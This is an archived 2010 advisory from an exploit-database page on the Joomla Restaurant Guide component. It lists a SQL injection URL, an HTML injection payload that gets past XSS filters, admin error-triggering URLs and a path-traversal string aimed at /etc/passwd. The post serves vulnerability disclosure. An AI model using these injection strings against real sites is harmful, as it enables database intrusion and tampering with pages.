[webapps / 0day] - Joomla Component com_restaurantguide Mult
Posted on 18 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Joomla Component com_restaurantguide Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Valentin Hobel' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================================= Joomla Component com_restaurantguide Multiple Vulnerabilities ============================================================= # Exploit Title: Joomla Component com_restaurantguide Multiple Vulnerabilities # Date: 18.09.2010 # Author: Valentin # Category: webapps/0day # Version: 1.0.0 # Tested on: Debian lenny, Apache2, MySQL 5, Joomla 1.5.x # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = Joomla Component com_restaurantguide Multiple Vulnerabilities Author = Valentin Hoebel Contact = valentin@xenuser.org [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = Restaurant Guide Vendor = Oh-Taek Im Vendor Websites = http://www.photoindochina.com/, http://extensions.joomla.org/extensions/directory-a-documentation/thematic-directory/14054 Affected Version(s) = 1.0.0 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> SQL Injection index.php?option=com_restaurantguide&view=country&id='&Itemid=69 (id parameter is vulnerable) >> HTML/JS/VBS Code Injection (all input fields, also in the admin backend) It is possible to inject HTML/JS/VBS code into the document although XSS filters are active. Simply end the current HTML tag and convert your code into decimal HTMl code without semicolons: "><A HREF="http://www.google.com./">injected</A> (which is "><A HREF="http://www.google.com./">injected</A>) The code doesn't get parsed, so it is not possible to exploit this weakness. However, including arbitrary plain text into the current website is possible. Dangerous! :D >> Interesting stuff a) Triggering various error messages in the admin panel is possible, e.g.: administrator/index.php?option=com_restaurantguide&controller=restaurantitems&task=edit&cid[]=[try ' or -1 or an ID which does not exist] Sometimes the code of the component gets displayed within the browser window when you try to trigger errors with different variables. b) Playing around with the controller variable administrator/index.php?option=com_restaurantguide&controller=../../../../../../../../../etc/passwd%00 (NOT a LFI vulnerability since the controller classes are defined in the source code, you just get different error messages.. nothing to exploit here..) [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> Additional Information Advisory/Exploit Published = 18.09.2010 [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] >> Misc Greetz = cr4wl3r, JosS, packetstormsecurity.org [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-18]</pre></body></html>
